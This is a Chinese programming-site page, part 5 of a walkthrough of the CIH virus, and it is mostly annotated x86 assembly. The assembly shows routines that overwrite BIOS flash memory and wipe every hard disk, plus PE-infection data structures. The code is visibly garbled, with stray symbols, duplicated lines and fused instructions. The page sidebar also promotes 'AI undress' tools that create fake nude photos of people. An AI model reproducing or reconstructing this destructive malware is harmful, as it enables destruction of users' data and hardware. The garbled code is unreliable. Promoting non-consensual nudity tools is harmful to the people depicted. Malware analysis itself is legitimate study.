首頁 後端開發 php教程 病毒程式原始碼實例剖析-CIH病毒[5]

病毒程式原始碼實例剖析-CIH病毒[5]

Jan 17, 2017 am 11:21 AM

病毒程式原始碼實例剖析-CIH病毒[5]

push ecx 
  loop $ 
  
  ;破壞BIOS中額外的000E0000 - 000E007F段的ROM資料,共80h個位元組 
  
  xchg ecx, eax 
  loop $ 
  
; 顯示並啟動BIOS的000E0000 - 000FFFFF段數據,共128 KB,該段可寫入訊息mov eax, 0f5555h 
  pop ecx ptr [eax], 20h 
  
  loop $
  
  ; 破壞BIOS的000FE000 - 000FE07F段數據,共80h字節 
  mov ah, 0e0h  『 00F0000 - 000FFFFF段,共64 KB 
  mov word ptr (BooleanCalculateCode-@ 10)[esi], 100ch 
  call esi 
  
  ; 破壞所有硬碟
  KillHardDisk: 
 〜  KillHardDisk:bumber  〜〜『 
  push ebx 
  sub esp, 2ch 
  push 0c00001000h 
  mov bhpush, 08〠〦〦〦〠〠〦〠〠〠〠〝pushpusho〠〠) ecx 
  push ecx 
  push ecx 
  push 40000501h 
  頟
  mov esi, esp 
  sub esp, 0ach 
  
  ;循環進行破壞
  『 4h 
  
  cmp word ptr [esi+06h], 0017h 
  je KillNextDataSection 
  
  ;換下一個硬碟
  ChangeNextHardDisk:〜『〟〜〦〜]  jmp LoopOfKillHardDisk 
  
  ;破壞下一個區域
  KillNextDataSection: 
  add dword ptr [esi+ 10h], ebx 
  mov byte ptr [esi+4dh], FirstKillHardDiskNumber 
  
  jmp able PROMToWrite: 
  mov [eax], cl 
  mov [ecx], al 
  mov byte ptr [ eax], 80h 
  mov [eax], cl 
  mov [ecx], al 
  
  ret 🀜EE:P0  㟎  ret 🀜 
  
  xchg eax, edi 
  xchg edx, ebp 
  out dx, eot , edi 
  xchg edx, ebp 
  in al, dx 
  
  BooleanCalculateCode = $g edi 
  xchg edx, ebp 
  out dx, eax 
  
  xchg eax, edi 
  x 。 
  db IFSMgr_RemoveFileSystemApiHook-_PageAllocate 
  db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook 
 擯指令 db＀＀"說話之差 
  
  VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的呼叫編號〦〜>使用Vxd調用的個數 
  
  ;病毒版本和版權資訊定義
  VirusVersionCopyright db ' CIH v' ;CIH病毒的標識 
  db MajorVirusVersion+'0' ;主版號 
  db '.' 
  db MinorVirusVersion+'0' ;次版本號' 
  db MinorVirusVersion+'0' ;次版本號' 
  db MinorVirusVersion+'0' ;次版本號' 
  db MinorVirusVersion+'0' ; ; 病毒大小
  VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) 
   + NumberOfSections*SizeOfVirusCodeSectionTable(08h) 
  ＀ VirusGameDataStartAddress = VirusSize 
  @6 = VirusGameDataStartAddress ;病毒資料起始位址
  
  OnBusy db 0 ;「忙碌」標誌
  FileModificationTime dd ? ;檔案修改時間 
  
  FileNameBuffer db FileNameBufferSize dup(?) ;7fh長的檔案名稱緩衝區〠🀜 〠『〜『〜『S＀ 〜〦〦〜〦〦〦〦〦〦〦〦〦〦》〦​​＀〜〦〦〦〜〦〦〜C*〜〦〜〜〦〦〜〦〜〦〦〜C<〦​​m〜〦〜C＀〜C＀〜C*〜〜  •
  @8 = DataBuffer 
  NumberOfSections dw ? ; 區塊數目 
  TimeDateStamp dd ? ; 文件時間 
  SymbolsPointer dd ? 
  NumberOfSymbols dd ? ; 符號表中符號個數 
 SizeOfOptionalHeader dw ?個檔案」的長度符號符號集 ; Magic dw ? ;標誌字(總是010bh)
  LinkerVersion dw ? ;連接器版本號 
。程式碼段起始RVA 
  BaseOfData dd ? ;資料段起始RVA 
  ImageBase dd ? ;裝入基址RVA 
  
  @9 = $ 
  SectionAlignment 對塊對齊sion dd ? ;所需作業系統版本號碼 
  ImageVersion dd ? ;使用者自訂版本號 
  SubsystemVersion dd ? ;所需子系統版本號 
  Reserved dd ? ; 保留 
  SizeOfImage ) ? 各部份總長izeOfImageHeaderToRead = $-NumberOfSections 
  NewAddressOfEntryPoint = DataBuffer 
  SizeOfImageHeaderToWrite = 04h 
  
  StartOfSectionTable = @9 
  SectionName = StartOfSectionTable = @9 
  SectionName = StartOfSectionTable = @9 
  
  VirtualAddress = StartOfSectionTable+0ch ;區塊的RVA 
  SizeOfRawData = StartOfSectionTable+10h ; 區塊實體長度 
PointerToRawData = StartOfSectionTable+14h ; 區塊實體偏移 
  PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移 
  PointerToLineNumbers = StartOfSection? Table+20h ; 重定位項目數目 
  NumberOfLinenNmbers = StartOfSectionTable +22h ; 行號表的數目 
  Characteristics = StartOfSectionTable+24h ; 區塊屬性 
  SizeOfScetionTable = Characteristics+04h-SectionName ; 每塊表塊表所需要的數量所需要的記憶體的數量; VirusNeedBaseMemory = $ 
  VirusNeedBaseMemory = $ 

  VirusTotalNeedMemory = @9 
  ; + NumberOfSections(??)*SizeOfScetionTable(28h) 
  ; + SOfVirusCodeS.? fVirusCodeSectionTable(08h) 
  ; + SizeOfTheFirstVirusCodeSectionTable(04h) 
  
  ;病毒程式結束
  VirusGame ENDS 
  END FileHeader
  從上述程式碼分析過程中,我們可以看出,CIH病毒結構清晰,層次分明。此病毒程式的主幹結構與DOS病毒極為相似,只不過對病毒細節的處理都是依win95方法,全部系統呼叫都是採用Vxd。這樣做讓病毒程式更加底層、效率更高,也便於編程,與用Windows下的API函數相比,無須考慮病毒本身的複雜重定位過程;與使用中斷相比,又更能防止對程式的追蹤分析。

  CIH病毒有兩個創新,一是病毒感染時查找感染對象文件的各塊之間的空白區域,把病毒自己的各種數據結構和代碼寫到其中(如果空白區域不夠就不傳染,這就是為什麼有些文件不會被感染的原因之一);二是病毒發作時能破壞電腦硬件,不但要燒毀Flash Memory,還要毀壞硬碟。

  出於安全的緣故,有關病毒發作、破壞硬體的這部分代碼,我們沒有給出詳細的分析。




以上就是病毒程式原始碼實例剖析-CIH病毒[5]的內容,更多相關內容請關注PHP中文網(www.php.cn)!



本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

在PHP API中說明JSON Web令牌(JWT)及其用例。 在PHP API中說明JSON Web令牌(JWT)及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一種基於JSON的開放標準,用於在各方之間安全地傳輸信息,主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時,可以生成和驗證JWT,並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大,調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、

會話如何劫持工作,如何在PHP中減輕它? 會話如何劫持工作,如何在PHP中減輕它? Apr 06, 2025 am 12:02 AM

會話劫持可以通過以下步驟實現:1.獲取會話ID,2.使用會話ID,3.保持會話活躍。在PHP中防範會話劫持的方法包括:1.使用session_regenerate_id()函數重新生成會話ID,2.通過數據庫存儲會話數據,3.確保所有會話數據通過HTTPS傳輸。

描述紮實的原則及其如何應用於PHP的開發。 描述紮實的原則及其如何應用於PHP的開發。 Apr 03, 2025 am 12:04 AM

SOLID原則在PHP開發中的應用包括:1.單一職責原則(SRP):每個類只負責一個功能。 2.開閉原則(OCP):通過擴展而非修改實現變化。 3.里氏替換原則(LSP):子類可替換基類而不影響程序正確性。 4.接口隔離原則(ISP):使用細粒度接口避免依賴不使用的方法。 5.依賴倒置原則(DIP):高低層次模塊都依賴於抽象,通過依賴注入實現。

在PHPStorm中如何進行CLI模式的調試? 在PHPStorm中如何進行CLI模式的調試? Apr 01, 2025 pm 02:57 PM

在PHPStorm中如何進行CLI模式的調試?在使用PHPStorm進行開發時,有時我們需要在命令行界面(CLI)模式下調試PHP�...

框架安全功能:防止漏洞。 框架安全功能:防止漏洞。 Mar 28, 2025 pm 05:11 PM

文章討論了框架中的基本安全功能,以防止漏洞,包括輸入驗證,身份驗證和常規更新。

如何在系統重啟後自動設置unixsocket的權限? 如何在系統重啟後自動設置unixsocket的權限? Mar 31, 2025 pm 11:54 PM

如何在系統重啟後自動設置unixsocket的權限每次系統重啟後,我們都需要執行以下命令來修改unixsocket的權限:sudo...

解釋PHP中的晚期靜態綁定(靜態::)。 解釋PHP中的晚期靜態綁定(靜態::)。 Apr 03, 2025 am 12:04 AM

靜態綁定(static::)在PHP中實現晚期靜態綁定(LSB),允許在靜態上下文中引用調用類而非定義類。 1)解析過程在運行時進行,2)在繼承關係中向上查找調用類,3)可能帶來性能開銷。

See all articles